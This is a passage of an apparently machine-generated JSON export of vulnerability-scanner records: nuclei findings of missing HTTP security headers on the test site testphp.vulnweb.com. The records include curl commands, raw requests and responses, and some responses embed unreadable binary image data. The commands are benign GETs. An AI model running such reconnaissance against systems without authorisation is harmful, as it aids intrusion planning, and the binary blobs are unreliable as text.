�5�>��~u\u0001c�B�93����pS\u0019\b���\u0003nu䊢;P����S'&N��2"���\u0006W��G�<��\u0011‚ǎIZ�l?��\u000f\u001b\u0010�\u0005YV�c\fB�\u0015��\u001am�Ӡ�%H�DU�ÿ���\r$�dր�D��bu\u0003�,�2\u001c��匨X���!,�\u0018�\u0017d\u0011\\�\u001ac��\u001b����dIe�(\u001fP�IT�qUVŅ�<\u000f�:�E\n�8�H�x�Um+�\u0006֟���p�_P�'�#��\u001a\u0007*e�9\u0004r\u0015\u000e�[k0��}�P~�L�V'\u00042���<��A�v��H}x��\u0013_�����\u0019L�B��X��B\u0014\u0005RV@K\u0012�KpG�\u000bDrh��3ʞN�xZ�����\u0006��VyY�o�w\u0010\u0016��\u001a�\u0011L�"���\u0005\u0004�s��s�>�y�m6���8��K0�"X��[Q�\u0016\u000bE�$�#q�g�\u001ck±�Ħ�*�һ�\fy#m\u000e,7�6\u0001��}#�\u001c���,����U��6ڀ���FGs��8\u001bZ�Zڋ�t�\u0017�,�\u001a��z�Wj7���UR��s@�\u000e\u0015\u0012\f�A�j����\u0013,H;�%\n��\u0016,_o���^��]�0�G�6��\u0014�n�\u001d�:�*_\\��1y�|��\u0004aM�v�F�B�_j��(�\u0006��o^���\\\r�����23\u001e�e�\u001d\u0013p\u0004�\u0004�\u0007�<\u000f�\u001a�3�$\u0003���\u0007��m\u0005�\u001cKF�>羝c\u0015\u0015ڵ���'\u0013\u001e��v\\�� �͖�䊾�(�<��8}\u000e\u0012�g&m����#��\u001f�����u��4Ǒx�N\u0015/]�s��\u000e�ohN/O�y1!n9e��7�\u0018�(�\u0006�Ǖ}��a\f����\u0004��a\n\u0001㶎�@ \u001f���ƍ��\u0007Τ���\u0017�\u0010@�18��\u001d\u0017\u001bX\u001e�BH\\c������܂4B\u001e~�\\։\u0004��?MP��I\r��ݹ��z���I� wfc�\u0015\u0014Y��@{\u0001��4ר.Yp�4E\n#�V$|�\u001bo4l]\u001e;���̼KT2wT��\u0013�\u001b?1���\u001e\u0007�IuR<+7������!{\u0010O�\u0013\u000e�3Y\u0016D�cb\u0003�a[�\u0018X\u0006��\u0001�ڹ\u00122[a�\u0007������\u000e\\,eґAU!@�߸\u001c�7ި{k\u000f��}Y����٢�\f\u0018ϰ|\u000f��_\u000f┃\u001f�ފ%\rD_'r��\u0004W\u0017ߛ�1�\u001bu\u0015�̝�(��]�T\u0016�l��Ln��\u0015Wܒöc#v8�9m\\��\u001bQ�Bֈ�]��^�9\u0001�.ϕ���N�ş��ן���l�&����p72��ܮ\t\u001f�T��n;\\M\u0005&�er�\u0006�E�n�Q<v<X44:\u0002Ɖ�{��h�@G��U��Q���1�O�Y�u��0ر\u0016p7\u001d���^O���������^�WƂ�,�N�N��I�L�:�%\t��������d\t�\fL���P�\u001d\u0016\u001c�#\r1eC`m\u000bb��U���ǁE&&zez���\u0018(P�[�\u001b6�7F����p5~\u0014��\u0001FR=��|`\rk�T��e�h�>/�H�}Y\\��qH�G�\u0001~/p�o����&���\u001a)V4�\u0004J�\u000e��\u0018�E\n<��^�ֆ\b�\u0003�\u001d\f �����̯~O L�?W��#�VV�f�dJ2P;��;�U\n�Y���:�x\u001d>6�7�-��V2ށ,F�7\u000f��أ}�j#�R;\r\\�>\u0016]�1�p<��>�w��1\f\u001f\u0015��4%�\u001e�V(��捀A\u0006��{���\u001f�P�\u000e>T�\u0015�r\u0002:�b�\u00057`\u001e\t����ӡb��#GUz�\u000e�h\n\u0003m�\u0001�@d�\u001b�4\u00016��x�<J\u0002�c�)a`\u001a&�w��\t\u0001����~ M�n�u����3�{\u001a\u0004�{���Lq��,��\\�\t��SI�S{\u001b�G�\u000f���|;!�\u0010���&r.�*�T[\u000e~m�h_��F�\u001d\u0003��VwM��9�I�4��ƕ\u0003!<w#m��}��\u0016\u000eO"@�zϞ�<p#3��)=\\�\tP���[���0�!\f��#J״�`S�<|��W�1�ۜ�H",h*�:S)}��u�b�p����D#\u0001{�\u001a��B�\u0006�;��4X�\u000b~M\u0002k�\u000e�?O���6@BѻF�\u001c:�5`�D\u001a���m\u0005�\n�H��\u0003w\u0002�����bj\\�\u0007��t��]���x�Z3HСD%����T�\u0017B�\u001e��v��\u0002��[�B>cc�u�P�|���˃d����\u0015����\u0016@;\u001et���I q���\u001c|���J���CL��1�%@�B��\b\u0004�5�\u001b\u0017V<�8��#�Q\u001364�E#Fɹ\u0018���k\u000e<\u0010H#�$jΒޤ~���S�������Z�:\u000f\u001d'5����zs;�Ӥ��6�\r\u0015$i�⤠nE?q���sK\u0019h\u0018�( �5d]_﫺fw�L\u0019$�k�G�\\��ЧO��m�1�����\u000e��H���\n��x\u0004]�}���<���$0ώ��\u0010�B7314\u0015Tr����c�j���\u001aJ�]A\u0017tG�\u0007L����s�嶰g�8��W\u001f"F�\\\t\u0013�S��_c�:���GYy�\u0002z��\u0011;U���\u0001I��]�w�گ�d�t��Xs\u001d�fW��\u001c���x\u0004X�/�W����D\u0005\u0015�C7�U����p+β]\u001b�<l�}Rޒ\u000b�C]�\u0007����@�bN�"20e"�\u0006�\u001a� �\u0014�T��\u0011�>8�\b�����������Q��\u0010N�;�\u001a�b\u0007ƺQgV��^5�e�B\u0004��Ƞ\u001e5��$�Ա�؟I�\u0012\u0001�������u�_���\u001d��~�\u0018Ѫ��Ҝh���1�A\u0013�\u001bA�����/����_�U�cV��\u0007�m_�\u00188S�@����SSUn\u001b��p>Oβ�\u0001���3�\u000fU����\ba�\\��SSV>E�J�����,u\u0006���:�\u001cO\u0003�\u00048B������Ӝef}$�\u0006=e�\tf˗��Z�m���ε���\u001a��)�\u0010\\1a\u0002\u001f\u0012�;k��\u0018��\b�����ՌX�ez�\u0004\u0011u���������=F\u0006�,\u001d��\u0004�菅sr'N�,�10亠�Ty�ۏmMM$y�='[oW��3W��T��}'\u001f+$ ��$( p�{�5���ښ�a�r�&\u0018�ͫ�󩩮\u000ba\u0013��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 937, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/7.jpg.tn", + "discovered_date": "2024-11-13T02:42:30.529Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/7.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6458\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:21 GMT\r\nEtag: "4dca64a1-193a"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0004\u0005\u0007\u0003\u0001\b��6\u0010\u0002\u0001\u0003\u0003\u0003\u0002\u0004\u0005\u0002\u0007\u0003\u0001\u0002\u0003\u0004\u0005\u0011\u0012!\u0006\u00131"A\u00072Qa\u0014\u0015#q�B�3CR���������\u001b\u0001\u0003\u0003\u0001\u0001\u0004\u0005\u0006\u0001\u0003\u0007\u0002��0\u0011\u0001\u0003\u0003\u0002\u0004\u0003\b\u0003\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0011!1\u0012\u0013AQaq�\u0006\u0014"2�������\u0015B��\f\u0003\u0001\u0002\u0011\u0003\u0011?��I�KMc��������^�ܡ�y!�2��w\u0005c�ϓϑ�\u0019�|x�\u001bT]K=$4n�2�\u0014ʌb��\f�\u0018,1φ�G�Qz~��=t�W�\u0002\u001aF*�O0uw�G�����|��q�7<6nI��<��\u0012)]%?��@�\u000ez�q���\u0014\u0003�s�j~��E ����μ��\u0017�Rׄ�H�7Y_$�5��T��\u0018Bʤ���������}\u001d�&�#R���O�d>�� y�\u001c��\u0007VR\u001c�\u0001u�v�4*Q�\u0018�� ���ަ\u0003\n\u0014�;���\f�ppt5\\��a�l\u0006��:�L��\u00059\u0007$�5ǧ�3����i��vb`�J�d�\u000f��jNﶃ:B�u�)�2\u001fS;�\u0014�"�İ�\u0007r�\u0004K1\u0003h�\u0003:.W��Y���;�w\nCI9������\tϝ3w�H��D�p�f�y�\u000b\rp���\u00171�~\u000e7x϶uWCw�D�\u000b�\u0012E@�\u000e�\u0018\u0012FAR}���\u000f\u0007\u0004\u00105:V���r����0�ѐ7W\f��\u0017n04� o}r�N>��+\rb�':�6Ll\u0011��8lx�Bt���c+[����\u000fIt�j�Y!��!�^�qʑ�,{�疉q�_�����d\u0014��G$P��\n\u000eԳ��\r�R����<g\u001cx�]�H�\u001dT�J�VشQ��l�dd�\u0003$g*\b\u0004��:�r�\u001bg�M$�\u0004h����V�Km\u0018珮F�E\u001bc����\u0018�󟲧�Ϛ�\u001b �S�v�������\u000b�\u0012�\bc}�PHq��������KQ\u001cK�WD\\��8��\u000f�Ӭ��R��i�#U+:Y�JJ���2B��\fW ��A�q�\u0019�Ρy�i��;^\u0013�4�8\u001f}}a|\u0012�\\Zu���\u0015\u001eP���±�\u0004�\u0006�//_\f�OC��\u0014KP�Xa/�j�!F\u0007k8;�@%x$`�Rx�_U\n��b��I\u0005E\u001c��%1�8�;����`����\u0007:Ww��L��rF�P{;8�����u'���\\::�b\u00163G�B�!;Ӎ�\u001caW����<\u000fa�$�`s���+䦪Ji�\u0018\u0012Aߌ+.\u001d_��\u0005P��]X\u0001��6�Z�8�\u001eK�\u0018D\u0019c�\u0018\u001a�����k��[o4O\u0015nk[����}ƚ�}�7u�Ĵ3H��M�7q&��*����N\u0007��p�ա�w�q���~�\u0001�~���=��E�锳�|��Lnp�\\3$\u000e���1����\n��;�B����(b�G�8c�\u0001vg,Ac�\u0013$�\u0005�J^�^=����ϝ\nu+�QG:\u0019B\f\u001c�#��΄�`q\u0012��M�\u0013[[�C�x�]��\u00158�4F:s\u0013"���RRT�y ���|���R�3��\u0002��ܮ}\u0011=ʎ\u0016���(bhi`H�\u0011\u0005";\u0011F�I�\n�?0b��:z�=L�4ҁ�\b�\u0001G\u0007�}������<���\u001c`t�?�8�X\u001bN�$/�[Vt�<\u001c���imS�@er�C\f\u0011�\fu\u0005������B��v�C�8� �8� ��D��uC�Z�H�s\t��Ͼ|\u0018�>O�\b\u001e��� ��\u0016�\u001d\u001c�!�>(*�Vl�PϲX�gqHӘ�]��\t\f��6L\u001cn8q.\u0015A\u0018!���5����'���\u0013�\u0016\u0013\u0006\u0014�9`�\u0005\b;9\u0007$�\u0003�hJ��ӳ�I�u=]\u0015X\u0002�\f�\u000b�'�T�_<����\u0001l��̴\u00157\u001b|�!�Id�\u0015-\u0018��w+6_�\u000b����|���jJ:��r�,\f���L\u001d�����5\u0015%W\r�\u0013��p5$�\u0016�iHऎ\u0018c\u0011"q�\fs�~�\u001f�����{�(\n1��7\u001c}��mH�ީ�\u000f�2f�i=��L�������a���2F�\f$esɩ�yt�\u0007����w\u001d7��\u0003g��':ނ�Ls�Uq\t#`@ �}KsƸK�5�j\u0016��i�@�].\u0004sȒƵ\u0012\f���퐟�p��\u0004����d\u0012\u0015��*�t�U�Lf�a\u0006A\u0002\u0017S\u001b�;�������\f0q�\u0005�u���_P6ᐰ#�\n��\u0011�\b��\u0013[)�p����KOz��r��\u0006p�$���r��[y��M;\u001ao�4���!f, /�ع^\u0010�`�\u0005\u0001ƢuM/P��%���L��1H���e�5��&с�(]��!G\u0003R:�\u0014J\t��4��e�y���%�\u000e���|g\u0019�\u0001$�~f�=Uj�u\u0015�Jj��AQG:�-c���������\u000eq��#��ˑ����~r0s��˷n�����l�s1���GIw�\u0012CW\u0004���v�s�G\u001c\u00022\u000e\b������sQQ\f��\u001dE-<2"��� �eV��q��9��r\u0018����0�Xk�\u0006����\u0014J�u��\u000e��\n2�\u001d��2.\u0014r@<x�k=MT߄\u0012,P��,-Q\u001a�r��=L1�p`s���x�=�hk�#9#ӧ�\n�C�'�f�>�h��%���^mv��K�]R�5=��;>%œ�8\u001bO,7z�g蹵%ud�2=�R:�w�D\u0011�\u0013�\u0017n���\u00047<�\f�\u001b�AƑ��Aq�|=���-p\\j\u0016&�U\u0003d����X�0US\u0019l`\u0005*��g\u0015���x��!�����\u0014HY���9�\u000f��og�k�6��8;��&�Vq�#ܕ�����z��T�9q\u0018\nN�p\u0007�Q��-\u0018��\u001aeK�B\u000f ����\u0017d.*Ȱ�U=��M|���i�A&�0ʮ��A\r�O>x��\u000f �r�^����b��i]c�!M嘜\u0001�;� \u0001�<�3_QJ�j�\b\u0012/y�Ā(p�,�W\fW!q�\u0004z��Ƞ��e�\u0011�_Qr��Ă\u001bz%E<�����Gc�S\u0012�|����3��)�"�{\twq���㺴�����̍ÇM5�׺�@����V�m��\u0019dd��d��!]��)��%Gd�\u0017h݃��wr���{b�jƪ\tQOH#\u0005�y�1���7�p\u0014��\u0017\frqik�K=m<�co����r�\u0015��ͶH"pCD���\u0013��@*FA\u0019:�q��\u001c��Qx�?��JcV���~�&U�\u0018�\u001e�ަ%@!�\u0018k���TD̐5\u001d����[��(��;���\u001b}�.VO̩%�\u0013��B���\b+�FőNH��\u001c0�:9��CGM\u001c\u0014�G\u0014(X�"�\u0001>O�p�>p��4\u0003C%e��=\u0015E��FD�1��ң\u0010��Xn�Y\u0018\u0016![,U�쓫UCMM\u001b�m\u0013\u0011����ŞA;\u0004��q��(\u001fh�t\u000e�G��t��\n�\u001b?���� �~���\u0007��eH\u0016\u0015!�\u001c�rc��"eo���׌�����\f!)\u000eO��\u001b�ttQ��p\fq�#2�Ԝ\u0003�\u0007?��[���5]Z�Dp��6KHi�F�����d k�C��\u000bURW%1h�f�0LNHʹ\u0005pp�[$\u00128�1�����4k4k\ftp�Q�j\u0014\u0006\u0005���\u0004d�b>��涁d1\u0019^I;_/u�`�U�Ͼ�PO�(\u001eڪ�Sb'\n9�\u001a����;�Q�\u001bco�V��(�o.�`\u001e�砺��=\u001bU4�_s���̴�0H�`�]�%�ڛd9\u001e��ǖ�jΣ�{���%m��$��Mٍ�i�A�~�\u0007 ��g!��+����X��G'|�L��\u0015�U5��F\u0019��8���^K\u0013C̣-9�m\u0015<w\u0010�\u0019��{���|A�Z��qhb��X)��V.�\n$��V��>�Ab����3���m����Z�����h�H�ե��nL��!M���#:=�-Cp4��V��e�d��\u0004��$�]�9\f�\u0001�<c\u001ccZGZOWm����Ve���5c*&��O�n�9<����5΢�ݣ9\u0019�����MyBQ�wY�w�*\f\u0001fWڏ\u000e��\u0012��\u0019�8]�a\u0019\u0004��\u001fQ[SU���\u001c\u0014�ћ\\Tp\\.\u0017j�V���!\u000b\u0012�QcUe-�d����P;����E4d�)h��3���� \u0012\u0001ǶH��uk}ɵ-.����gO��7;G���-ӿs�N�VDA\u0019ld�J�2$\u0003��p���7U.�Y%��Z%�����e�\u0003~>V%X��'����\u0018%z�WM;F�v\u001f�����é����}?UCp�[�vj�Tn��~�ɂ�F1����O,t��q�\b��Ϗ�T��m��8;��+A�KUl�W$�{c�;��ȩj'W\u0006\u0005A�\u001bҪIS���<��\rc\u0015\u0015�_���qV\u001d�aI6\u000e��]�\r�U���\n�[WY]h�J��m��WYd�����J�(��Q\u0013v��@_�Q��s�ܱ��5��A\u0007b��9h�+$�UWA�Hm�GX�\u0003\u0003f�ƒ��Y%����.'\u0019=3���\u0015E�����\u0001���r��A�x^E���@'����\u001af\u001bF��6��@�<�",c��J)c�!|\f�g�\u0001���%�\u000f��m!xo��\\���9���<U���<�\r��OG\u0019�D�3�F|�i�*������.�\r\u001fv��X;��h{���\\\u0005]�rJ���<�:����D�;!��"�v�z�V+����O�V���xRV=Ѝ�\u0004��D���j��\u0015$�M��:\u0003�T���ۜ��[;�\u0010IfR�N\u000b\u001e[�\u0006p<h�)�#Ս\u000fo|�\u0010e:�|�\u0011��c��\u0010�}�uf�\fq�������-Mgj&bx\u0003?MA��e\f$�H$\u001c4r.�S�y\u0007�\u001f��t�\u0007�:�c�yo\u0018\u001a\u0005"��\u001b��5c�����z\u000e\u000f��Е\\�T��[N��;��*�i��U�e�$c �yʰP��[\u00168��\u0014\u0014o�<=\u0013�SG\u001f\f�3�\u0002|ꅪ袞W��Zр�;�\u001e\u0018{6>d?�\u0006\u001b����}_��Y\u001fn�R�H\u0003,sQwx`;\u001dH �\u0018��\u0004{\u001d\u0015^�n���vJ�=\u001a\u001b�D��2mٖ*@E\u0001�*\fP\u0007�F2F�nW8�\f' �d\u001d��m���o\u0017Q�[t\u000f�j���e\u0013R�OGN�ݎ�\u0011\u001231J�!US�2\b��r\t'ZM��Yx��d\u0011��W�Y�*e_F\u0019\u0015��h��K\u0002���Iпº�T\r;�f���Q+�������;{{�g�\u00060�c�t۽eB[n]�I��Pc\u000b\u0018\u0007\u0001pp\u000f�\b9����\u0005d�\u0013?��\u0001��s��׿�4T�������|J��\u001a��\u0015�6���i\u0016)���\u0001e��rB�\u0007��\f\u0002\u00179\u0004\u0003�z:���G/e@���Z��j��=\u00038P?P��>\u0017\u001bpwj��\u0015l7\u001b\u001d�\u000b�(��\u0011\u0011hX�����\u001f(\r�b\u0014��\u0017\u0019k��m���r��jAFn�R1�R�!�=�n�h-�8�=@s����5��7G�����P5\u0014�Ԟ'\u0015�ݮL�)G }�I֫���g\u0002��\u0005��cC\u0015K�d�Ͼ>�i�'v͏��\f�\t��#w_���:k$��ֺ���I\u0017a@\f�͂�\u0001l�2�3�S����������4v0��02����\u0001$\u001e��ާ���ʐq�*L�\\\u0005{DP�Wi��V�*AK��ʛ�-$S�L�5�\b��I\u0004\u000f\u001c�e���,��X2�����#`\u001c��[`>��`��1*�{��1b\u0014�T����\u0004�G�\f[�����4�Y]�E\u0010�!��\n���\u000f��\u0015\u001c��\b��\u000bE(���q�<���Γ<#\u0019E���\u0007�՜S}1�\u001d\bQ�IRf\u0014�\n�K�y�\u0010��0��\b\u0018��d��8��3�u�H��\u00063"�\u001e�\u0004�G�\f\t\u0007�i�U�9�����*-ҵ��\r\u0011\u0014�q���-ܳ��R\u00179S�X�A�\u0006\u001c0#ʌ�FG�A��\u001fC�B��c�kl��0��\u0015��:\u0019\u0003۸U�3Av�]��Z�yv���0dm�\t\u0001���v.p\u0006\\~ڕOr�E���\t)��\u001b�\t$\u001b{�=���8\u0005�ό�y\u0007T�N�P!�z��V�gJh���ul*�KnU���\u0003#E6n���\u001b\u0005'P\\\u001e��S\u00075�,�;�\u001d��[i,\u00102���n�s�LUܤ�J8��\u001d���'��a��_\u0017\u0017\u000e\u001c��W�Q\u0006J�<-�Q����pA��\u0011��t��\u001a�����U���\u0012\u001aVffyQQ1�A\u0019Q��C`�DղR,]�Y�,^'ĉ\u001dJ+�,>W��Xd`�\u001c\u0010u��1��Id���As5MJ�:KT�+\u0018�f�-�,��x�q��[�]���������^�Z�K�����B��<�p�.�\u0012���\u0003�q�\u0019��0H`\t*qQ]++J�K$/,f)\fNW��ʶ<��<k���N�ʉ(�\u001a�\u0001-+2��8ǥW�1��H,I$�\u001d\\�mt�+�2K<�����X��\u001fՖl�����^��bi�n�[@b���"n���Ώ���<���EZU�t\u0010�\u0015,��WԹQ�F\t<`6���\u0010��K��l\u0014��̴��B���Ű�s�� ��ƾ|���])^��\t���7Ԏ\u0007k��|��9\u001e�\u0007�g�/�3T��2PR��[䥑��z��L\u0018��W�!�eJg#\u0007��u�\n|\u00170\u0002�~�_Ң�s���'��QY��n\u001f���J��\f��%cR\u0017�@,Wv|��G,�?X�kii�\u0015@��a}��G!,P\f�\u000f|�\t<\u0003�h{�� ��f\ti��2��2����\u001c��X�\u001c�\u001fvÝہ\u0019\u0007X���i���\n���m E,���dv�\u0017R0�\u0001�\f��\f���E%��4�\u0001g\u001e#l\u001f��DI8n���i���?m�D�l�U�\u001dxl6<��\u001f�\u000f��+���� !�x�⎵�\u0005�^�c�\u0013hR\u000eO��,Ř�\\�9ZZ��1��du\tU\u001b�$�>�����3h�j��\u0015�\fdp]\u0002'���\u0019S���8\u0004k@�ė��q\\n۪�\u0019e�Y\u001d�QZF$�\u000e\t��'?3\u000f\u0007\u001aZZAZ��\u0018�\f\u001e>���d����z��\u001b?Kt�[��~k\u000b�U������j1�`\r���\u001f�`\n1#,x\u0007KKU\u0016�L\u001cG|��O^>0\u0017���S$K;�����6bU\u0001bH\u0003<d��\u0016P�r�\u0018�\u001aZZmnF\bJn��aL.����RQ�Ϩl�5\u000f"�S_\u0005;��kly\u0002�\u000f�\u0007Ζ���$S���\u0003B\u0001��U_\r�puWX��wf��&\f�,m���-��\u0002F\u000e9ǂ5�X�d��\u000e��鈒�A\u0014i\u0014O�,\u000b\u0014;���ң��Ϝaik�{@���\t��\n���N�%��IGE\u0005������\u0018鷡U%�\t\\�\fĐ���\u0007�A9ڸ1�J����ui_RgM�Yʾ\u000fv#��r}M�?1�x��֩>*Fqk���9�E��T�5L��\u001bܖ8\u0018\u0019Ή�\u0016��A�6x�j��\u0013ԤNar��\u0010\b�A������w\u000f\u000f�\u0011�:�\u0007�hi\u001a�4��)�nW\n�i�a$B\u0002E6\u001dP�\u0003��d���i\u0005���D�T�(�\u0019\u000b�\u000br�P��@��\u001f�KK\\�W��X3տ�՟#�VY���C\u001d\u0002�v;�U��\f�HwaDn���1������m��VR�\u0013;,Ԑ�6�\u000e\u0019�$\u000e<iij���LM\u0005.��+��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 938, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36' 'http://testphp.vulnweb.com/wvstests'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/wvstests", + "discovered_date": "2024-11-13T02:42:30.787Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /wvstests HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:27 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /wvstests/</title></head>\r\n<body>\r\n<h1>Index of /wvstests/</h1><hr><pre><a href="../">../</a>\r\n<a href="pmwiki_2_1_19/">pmwiki_2_1_19/</a> 08-Apr-2013 08:44 -\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 939, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/8.jpg.tn", + "discovered_date": "2024-11-13T02:42:31.032Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/8.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4139\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:25 GMT\r\nEtag: "4dca64a1-102b"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0003\u0004\u0005\u0001\u0007\b��;\u0010\u0001\u0003\u0002\u0004\u0002\u0006\b\u0005\u0004\u0002\u0003\u0001\u0002\u0003\u0011\u0004\u0005\u0012!1AQ\u0006\u0013"aq�\u00142T�����$B���\u0015#3�Rb4r���\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007��(\u0011\u0002\u0001\u0003\u0003\u0004\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011!\u0004\u00141\u0005\u0012AQ\u0013\u0015"B2ab���\f\u0003\u0001\u0002\u0011\u0003\u0011?�S�K��@�\u001bU\u0010z�~\u001d*D���@e��\u0012+�oQ��Vߩ�}I�����{9%L�Oy\u0014ÃX�z�?��h�"2��0\u000f�5ޤѺ�\u000bU��Z|\f���vv�����\u0003)����i��R���Eã�o�t\u001f\u0014\nc�5�uB�\u000fq����\u001b���t�H�)�l\u0007�� N\u0015{\u001e�\u0003�U]�7\u0012`�\tM��aT��h�k�-&\u001el)=�\u0002�F\u0013k��\u0018���W6��$��S��u�\u000ey�eQ��\u0015�I9g��\u0017�0$�\u0015��56\f�m��#�����N�Oq�����Ʋh|���I/2\u001a,-���$w\u001d~uE�[ ������V�����"<�H�\f��;�\u0015R+.A��G.F\u0018K\u0003vTڞ�e\u0013��>�\u0002p\u0007`�_�:�\u0018\u0002�0A�ދ�C�\\!�\u001eJ�����\n�H�U+Z�wQkXBS�m�\u0014װ�3B�Ȏ\u0019������+J7�\t��hI���\u0016j\u0003�G΋��{C?\u0018�\u0013`6�d��3�=s��`��(�ȟ3�����\u001b'��wཥ��W\u0005�M|b��\u001fW<ظ\u0007�\t�\u0015Q�����\u001e%?J3�\u000f�����[\u000e7\f�b�օt� 